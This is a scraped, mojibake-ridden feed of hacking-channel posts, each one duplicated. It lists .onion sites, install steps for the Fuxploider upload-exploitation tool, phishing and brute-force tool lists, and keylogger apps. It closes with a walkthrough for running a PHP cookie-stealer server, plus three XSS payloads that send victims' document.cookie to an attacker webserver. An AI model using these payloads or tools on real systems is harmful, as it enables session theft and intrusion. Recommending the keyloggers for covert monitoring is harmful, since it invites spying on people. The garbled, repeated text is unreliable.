β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦New 2020 deepweb .onion for > Blogs
http://74ypjqjwf6oejmax.onion/ β Beneath VT β Exploring Virginia Techβs Steam Tunnels and Beyond
http://76qugh5bey5gum7l.onion/ β Deep Web Radio
http://edramalpl7oq5npk.onion/Main_Page β Encyclopedia Dramatica
http://ih4pgsz3aepacbwl.onion/ β Hushbox
http://ad52wtwp2goynr3a.onion/# β Dark Like My Soul
http://tns7i5gucaaussz4.onion/ β FreeFor
http://gdkez5whqhpthb4d.onion/ β Scientology Archive
http://newsiiwanaduqpre.onion/ β All the latest news for tor
http://5vppavyzjkfs45r4.onion/ β Michael Blizek
http://7ueo7ahq2xlpwx7q.onion/ β AYPSELA News
http://7hk64iz2vn2ewi7h.onion/ β Blog about Stories
http://tigas3l7uusztiqu.onion/ β Mike Tigas
http://mpf3i4k43xc2usxj.onion/ β Sam Whited
http://7w2rtz7rgfwj5zuv.onion/ β An Open Letter to Revolutionaries
http://3c3bdbvhb7j6yab2.onion/ β Totse 2
http://4fvfamdpoulu2nms.onion/ β Lucky Eddieβs Home
http://nwycvryrozllb42g.onion/searchlores/index.htm β Fraviaβs Web Searching Lore
http://newsiiwanaduqpre.onion/ β OnionNews β Blog about the onionland
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦New 2020 deepweb .onion for > Blogs
http://74ypjqjwf6oejmax.onion/ β Beneath VT β Exploring Virginia Techβs Steam Tunnels and Beyond
http://76qugh5bey5gum7l.onion/ β Deep Web Radio
http://edramalpl7oq5npk.onion/Main_Page β Encyclopedia Dramatica
http://ih4pgsz3aepacbwl.onion/ β Hushbox
http://ad52wtwp2goynr3a.onion/# β Dark Like My Soul
http://tns7i5gucaaussz4.onion/ β FreeFor
http://gdkez5whqhpthb4d.onion/ β Scientology Archive
http://newsiiwanaduqpre.onion/ β All the latest news for tor
http://5vppavyzjkfs45r4.onion/ β Michael Blizek
http://7ueo7ahq2xlpwx7q.onion/ β AYPSELA News
http://7hk64iz2vn2ewi7h.onion/ β Blog about Stories
http://tigas3l7uusztiqu.onion/ β Mike Tigas
http://mpf3i4k43xc2usxj.onion/ β Sam Whited
http://7w2rtz7rgfwj5zuv.onion/ β An Open Letter to Revolutionaries
http://3c3bdbvhb7j6yab2.onion/ β Totse 2
http://4fvfamdpoulu2nms.onion/ β Lucky Eddieβs Home
http://nwycvryrozllb42g.onion/searchlores/index.htm β Fraviaβs Web Searching Lore
http://newsiiwanaduqpre.onion/ β OnionNews β Blog about the onionland
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 deepweb forums via the Anonet Webproxy 7/24 online
http://sbforumaz7v3v6my.onion/ β SciBay Forums
http://kpmp444tubeirwan.onion/ β DeepWeb
http://r5c2ch4h5rogigqi.onion/ β StaTorsNet
http://hbjw7wjeoltskhol.onion β The BEST tor social network! File sharing,
messaging and much more. Use a fake email to register.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
http://sbforumaz7v3v6my.onion/ β SciBay Forums
http://kpmp444tubeirwan.onion/ β DeepWeb
http://r5c2ch4h5rogigqi.onion/ β StaTorsNet
http://hbjw7wjeoltskhol.onion β The BEST tor social network! File sharing,
messaging and much more. Use a fake email to register.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦File upload vulnerability scanner and exploitation tool.
termux-linux
> Fuxploider is an open source penetration testing tool that automates the process of detecting and exploiting file upload forms flaws. This tool is able to detect the file types allowed to be uploaded and is able to detect which technique will work best to upload web shells or any malicious file on the desired web server.
t.me/UndercodeTesting
π¦ πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/almandin/fuxploider.git
2) cd fuxploider
3) pip3 install -r requirements.txt
π¦ For Docker installation
# Build the docker image
docker build -t almandin/fuxploider
4)example run :
> python3 fuxploider.py --url https://awesomeFileUploadService.com --not-regex "wrong file type"
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦File upload vulnerability scanner and exploitation tool.
termux-linux
> Fuxploider is an open source penetration testing tool that automates the process of detecting and exploiting file upload forms flaws. This tool is able to detect the file types allowed to be uploaded and is able to detect which technique will work best to upload web shells or any malicious file on the desired web server.
t.me/UndercodeTesting
π¦ πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/almandin/fuxploider.git
2) cd fuxploider
3) pip3 install -r requirements.txt
π¦ For Docker installation
# Build the docker image
docker build -t almandin/fuxploider
4)example run :
> python3 fuxploider.py --url https://awesomeFileUploadService.com --not-regex "wrong file type"
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦BEST WORDPRESS 2020 PLUGINS
twitter.com/undercodeNews
1) WPForms integrates with all popular marketing and payment platforms, so you can build powerful forms in less than 5 minutes.
https://wpforms.com/
2)MonsterInsights is the best Google Analytics plugin for WordPress. It allows you to βproperlyβ connect your website with Google Analytics, so you can see exactly how people find and use your website.
https://www.monsterinsights.com/
3) Yoast SEO is one of the most popular WordPress plugin of all time. Out of all the WordPress SEO plugins, Yoast offers the most comprehensive solution with all the features and tools that you need to improve your on-page SEO.
https://wordpress.org/plugins/wordpress-seo/
4) Email is the most effective and most reliable marketing tool at your disposal as a business owner. It allows you to stay in touch with your users even after they leave your website. This is why we recommend every business owner to start building an email list right away.
https://www.constantcontact.com/global/home-page
5) OptinMonster is the most popular conversion rate optimization software in the market. It allows you to convert abandoning website visitors into email subscribers and customers.
https://optinmonster.com/
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦BEST WORDPRESS 2020 PLUGINS
twitter.com/undercodeNews
1) WPForms integrates with all popular marketing and payment platforms, so you can build powerful forms in less than 5 minutes.
https://wpforms.com/
2)MonsterInsights is the best Google Analytics plugin for WordPress. It allows you to βproperlyβ connect your website with Google Analytics, so you can see exactly how people find and use your website.
https://www.monsterinsights.com/
3) Yoast SEO is one of the most popular WordPress plugin of all time. Out of all the WordPress SEO plugins, Yoast offers the most comprehensive solution with all the features and tools that you need to improve your on-page SEO.
https://wordpress.org/plugins/wordpress-seo/
4) Email is the most effective and most reliable marketing tool at your disposal as a business owner. It allows you to stay in touch with your users even after they leave your website. This is why we recommend every business owner to start building an email list right away.
https://www.constantcontact.com/global/home-page
5) OptinMonster is the most popular conversion rate optimization software in the market. It allows you to convert abandoning website visitors into email subscribers and customers.
https://optinmonster.com/
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Twitter
UNDERCODE NEWS (@UndercodeNews) | Twitter
The latest Tweets from UNDERCODE NEWS (@UndercodeNews). We provides you daily hacking News & Security Warning & Technologies news & Bugs reports & Analysis... @UndercodeNews @UndercodeUpdate @iUndercode @DailyCve. Aus/Leb
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦MOST ACTIVE ATTACKS 2020 :
instagram.com/UndercodeTesting
1. Phishing
One of the most insidious techniques used today is Phishing.Itβs hard to find the person that doesnβt know what phishing is. However a lot of users are still getting tricked by hackers on a daily basis.
Phishing implies the replication of the website with the aim of stealing money or personal information. And once a user enters his credit card details,for example, a hacker will have access to that data and will be able to use the received information for his own benefit.
2. Viruses and malicious code
Hackers can crawl almost into any website and leave in itsβ database malware or insert code into the websiteβs files. There is a huge variety of viruses, and each may impact the infected site differently. But there should be no doubt that a virus, regardless of its type, will not benefit your business.
3. UI Redress
This technique is similar to phishing. But in this case, a hacker would create a fake hidden user interface. Once the a user clicks the button with an intention of to proceed to a certain page, he will find himself on an unfamiliar website, usually with an inappropriate content.
4. Cookie Theft
With the help of a malicious software hackers can steal your browserβs cookies. And those cookies contain a lot of important information: browsing history, usernames and passwords. As you understand,that data can also contain logins and password to your websiteβs administratorβs panel.
5. Denial of Service (DoS\DDoS)
DDOS stands for Distributed Denial of Service. DDOS attack is a way to make a certain server unavailable or, in other words, a way to crash the server.
To interrupt or crash the server a hackers would use bots. Those bots soul purpose is to send requests to the website, a lot of requests. As a result, a server unable to process all of the received requests will simply crash. The most hazardous thing about this technique is that a hacker can crash the server in a relatively small amount of time
6. DNS spoofing
This malware is also known as DNS cache poisoning. It engages that old cache data you might have forgotten about.
Vulnerabilities in the domain name system allow hackers to redirect traffic from your website to a malicious one. Moreover, hackers can program this attack so the infected DNS server will infect another DNS and so on.
7. SQL injection
If your website has vulnerabilities in its SQL database or libraries, hackers can get access to your confidential information by deceiving the system.So there is no surprise that SQL injections can also be a simple tool. But this simple tool can allow a hacker to access vital information of your website.
8. Keylogger injection
The Keylogger that very simple and dangerous malicious code.
The malware records keystrokes , captures all of the userβs actions on the keyboard, and to send all that has been recorded to the hackern ; it also installs a malicious script that produces an in-browser cryptocurrency miner.
If a hacker succeeds in obtaining data, then the result of the hacking will be stolen admin credentials that can allow hackers to easily log into your website
9. Non-targeted website hack
In most cases, hackers donβt target a specific website. They are more interested in massive hacking.
It is easy to suffer from a non-targeted attack β you just need to overlook any CMS, plugin or template vulnerability. Any gap is a chance to get into the hackerβs sight and become a victim during the next attack.
Hackers can find websites with similar weaknesses easily. They can always use Googleβs Hacking Database to receive a list of vulnerable websites that have the same properties. For example, hackers can find all indexed websites that have a vulnerable plugin installed. Or websites with unhidden catalogues.
10. Brute force
A Brute Force Attack is the simple method to gain access to a website. It tries various combinations of the passwords again and again until it gets in. This repetitive action is like an army attacking a fort.
π¦MOST ACTIVE ATTACKS 2020 :
instagram.com/UndercodeTesting
1. Phishing
One of the most insidious techniques used today is Phishing.Itβs hard to find the person that doesnβt know what phishing is. However a lot of users are still getting tricked by hackers on a daily basis.
Phishing implies the replication of the website with the aim of stealing money or personal information. And once a user enters his credit card details,for example, a hacker will have access to that data and will be able to use the received information for his own benefit.
2. Viruses and malicious code
Hackers can crawl almost into any website and leave in itsβ database malware or insert code into the websiteβs files. There is a huge variety of viruses, and each may impact the infected site differently. But there should be no doubt that a virus, regardless of its type, will not benefit your business.
3. UI Redress
This technique is similar to phishing. But in this case, a hacker would create a fake hidden user interface. Once the a user clicks the button with an intention of to proceed to a certain page, he will find himself on an unfamiliar website, usually with an inappropriate content.
4. Cookie Theft
With the help of a malicious software hackers can steal your browserβs cookies. And those cookies contain a lot of important information: browsing history, usernames and passwords. As you understand,that data can also contain logins and password to your websiteβs administratorβs panel.
5. Denial of Service (DoS\DDoS)
DDOS stands for Distributed Denial of Service. DDOS attack is a way to make a certain server unavailable or, in other words, a way to crash the server.
To interrupt or crash the server a hackers would use bots. Those bots soul purpose is to send requests to the website, a lot of requests. As a result, a server unable to process all of the received requests will simply crash. The most hazardous thing about this technique is that a hacker can crash the server in a relatively small amount of time
6. DNS spoofing
This malware is also known as DNS cache poisoning. It engages that old cache data you might have forgotten about.
Vulnerabilities in the domain name system allow hackers to redirect traffic from your website to a malicious one. Moreover, hackers can program this attack so the infected DNS server will infect another DNS and so on.
7. SQL injection
If your website has vulnerabilities in its SQL database or libraries, hackers can get access to your confidential information by deceiving the system.So there is no surprise that SQL injections can also be a simple tool. But this simple tool can allow a hacker to access vital information of your website.
8. Keylogger injection
The Keylogger that very simple and dangerous malicious code.
The malware records keystrokes , captures all of the userβs actions on the keyboard, and to send all that has been recorded to the hackern ; it also installs a malicious script that produces an in-browser cryptocurrency miner.
If a hacker succeeds in obtaining data, then the result of the hacking will be stolen admin credentials that can allow hackers to easily log into your website
9. Non-targeted website hack
In most cases, hackers donβt target a specific website. They are more interested in massive hacking.
It is easy to suffer from a non-targeted attack β you just need to overlook any CMS, plugin or template vulnerability. Any gap is a chance to get into the hackerβs sight and become a victim during the next attack.
Hackers can find websites with similar weaknesses easily. They can always use Googleβs Hacking Database to receive a list of vulnerable websites that have the same properties. For example, hackers can find all indexed websites that have a vulnerable plugin installed. Or websites with unhidden catalogues.
10. Brute force
A Brute Force Attack is the simple method to gain access to a website. It tries various combinations of the passwords again and again until it gets in. This repetitive action is like an army attacking a fort.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦most 2020 phishing tools used by hackers
> on github
Infosec IQ
Gophish.
LUCY.
Simple Phishing Toolkit (sptoolkit)
Phishing Frenzy.
King Phisher.
SpeedPhish Framework (SPF)
Social-Engineer Toolkit (SET)
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦most 2020 phishing tools used by hackers
> on github
Infosec IQ
Gophish.
LUCY.
Simple Phishing Toolkit (sptoolkit)
Phishing Frenzy.
King Phisher.
SpeedPhish Framework (SPF)
Social-Engineer Toolkit (SET)
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦MOST USED BRUTE FORCE TOOLS 2020
t.me/UndercodeTesting
1)Ophcrack for windows is an excellent option for brute forcing passwords and cracking.
http://ophcrack.sourceforge.net/
2) Brutus uses a technique called time memory trade off which allows for large multi-threaded brute forcing attacks all at once.
http://www.hoobie.net/brutus/
3) Cain and Able is not only a password cracker but and overall excellent network security tool.
> http://www.oxid.it/
4) John the Ripper is compatible with Linux, Unix and fully able to brute force Windows LM hashes. Although, John the Ripper is not directly suited to Windows. This software is extremely fast at brute force cracking Linux and Unix NTLM hashes.
> http://www.openwall.com/john/
5) Medusa is a variation of the THC Hydra cracking software. Medusa has many advantages by being a speedy parallel, modular and login brute forcing tool.
<> http://foofus.net/goons/jmk/medusa/medusa.html
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦MOST USED BRUTE FORCE TOOLS 2020
t.me/UndercodeTesting
1)Ophcrack for windows is an excellent option for brute forcing passwords and cracking.
http://ophcrack.sourceforge.net/
2) Brutus uses a technique called time memory trade off which allows for large multi-threaded brute forcing attacks all at once.
http://www.hoobie.net/brutus/
3) Cain and Able is not only a password cracker but and overall excellent network security tool.
> http://www.oxid.it/
4) John the Ripper is compatible with Linux, Unix and fully able to brute force Windows LM hashes. Although, John the Ripper is not directly suited to Windows. This software is extremely fast at brute force cracking Linux and Unix NTLM hashes.
> http://www.openwall.com/john/
5) Medusa is a variation of the THC Hydra cracking software. Medusa has many advantages by being a speedy parallel, modular and login brute forcing tool.
<> http://foofus.net/goons/jmk/medusa/medusa.html
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦best 2020 keylogger -apps
pinterest.com/undercode_Testing
1) http://www.spyrix.com/spyrix-free-keylogger.php
2) https://kidinspector.com/
3) http://www.actualkeylogger.com/
4) https://store.payproglobal.com/r?u=https://www.refog.com&a=4913
5) https://www.iwantsoft.com/
6) https://kidlogger.net/?lang=en
8) https://www.logixoft.com/en-us/index
9) https://www.ardamax.com/keylogger/ free
10) https://sourceforge.net/projects/basickeylogger/
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦best 2020 keylogger -apps
pinterest.com/undercode_Testing
1) http://www.spyrix.com/spyrix-free-keylogger.php
2) https://kidinspector.com/
3) http://www.actualkeylogger.com/
4) https://store.payproglobal.com/r?u=https://www.refog.com&a=4913
5) https://www.iwantsoft.com/
6) https://kidlogger.net/?lang=en
8) https://www.logixoft.com/en-us/index
9) https://www.ardamax.com/keylogger/ free
10) https://sourceforge.net/projects/basickeylogger/
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Pinterest
UnderCode TESTING (UNDERCODE_TESTING) - Profile | Pinterest
UnderCode TESTING | πππππ£βπ ππ πππ€π₯πππ βπ ππ‘πππͺ:
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦PHP Cookie Stealing Scripts for use in XSS
t.me/undercodeTesting
π¦ πβπππΈπππππΈπππβ & βπβ :
1) On the remote attacker machine, start the webserver (Apache2 in example):
> sudo service apache2 start
2) Git clone the repo locally and then push the chosen "Cookie stealer" PHP script from local host to the attacking machine
git clone https://github.com/RxSec/CookieHeist
3) cd CookieHeist
sudo scp cookiestealer-simple.php username@AttackMachine:/var/www/html/
4) sudo scp log.txt username@AttackMachine:/var/www/html/
π¦AWS Version:
scp -i AWS-Key.pem cookiesteal-simple.php ec2-user@ec2[YOUR IP].us-east-2.compute.amazonaws.com:~/.
sudo mv cookiestealer-simple.php /var/www/html/
Example: http://[Attacker Webserver]/cookiesteal-simple.php
π¦Setting Permissions:
Figure out which user is owning httpd process using the following command:
ps aux | grep httpd
Output should be similar to this:
ec2-user 1569 0.0 0.1 12840 1064 pts/0 S+ 17:55 0:00 grep httpd
So now you know the user who is trying to write files, which is in this case ec2-user You can now go ahead and set the permission for directory where your php script is trying to write something:
sudo chown ec2-user:ec2-user /var/www/html/
sudo chmod 755 /var/www/html/
XSS Payload Examples:
<script javascript:text>document.location="http://[Attacker Webserver]cookiesteal-simple.php?c=" + document.cookie + "&t=Alert"; </script>
<script>document.location='http://[Attacker Webserver]/cookiesteal-v.php?cookie=' + document.cookie</script>
<img src=x onerror=this.src='http://[Attacker Webserver]/cookiesteal-v.php?cookie='+document.cookie>
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦PHP Cookie Stealing Scripts for use in XSS
t.me/undercodeTesting
π¦ πβπππΈπππππΈπππβ & βπβ :
1) On the remote attacker machine, start the webserver (Apache2 in example):
> sudo service apache2 start
2) Git clone the repo locally and then push the chosen "Cookie stealer" PHP script from local host to the attacking machine
git clone https://github.com/RxSec/CookieHeist
3) cd CookieHeist
sudo scp cookiestealer-simple.php username@AttackMachine:/var/www/html/
4) sudo scp log.txt username@AttackMachine:/var/www/html/
π¦AWS Version:
scp -i AWS-Key.pem cookiesteal-simple.php ec2-user@ec2[YOUR IP].us-east-2.compute.amazonaws.com:~/.
sudo mv cookiestealer-simple.php /var/www/html/
Example: http://[Attacker Webserver]/cookiesteal-simple.php
π¦Setting Permissions:
Figure out which user is owning httpd process using the following command:
ps aux | grep httpd
Output should be similar to this:
ec2-user 1569 0.0 0.1 12840 1064 pts/0 S+ 17:55 0:00 grep httpd
So now you know the user who is trying to write files, which is in this case ec2-user You can now go ahead and set the permission for directory where your php script is trying to write something:
sudo chown ec2-user:ec2-user /var/www/html/
sudo chmod 755 /var/www/html/
XSS Payload Examples:
<script javascript:text>document.location="http://[Attacker Webserver]cookiesteal-simple.php?c=" + document.cookie + "&t=Alert"; </script>
<script>document.location='http://[Attacker Webserver]/cookiesteal-v.php?cookie=' + document.cookie</script>
<img src=x onerror=this.src='http://[Attacker Webserver]/cookiesteal-v.php?cookie='+document.cookie>
β β β ο½ππ»βΊπ«Δπ¬πβ β β β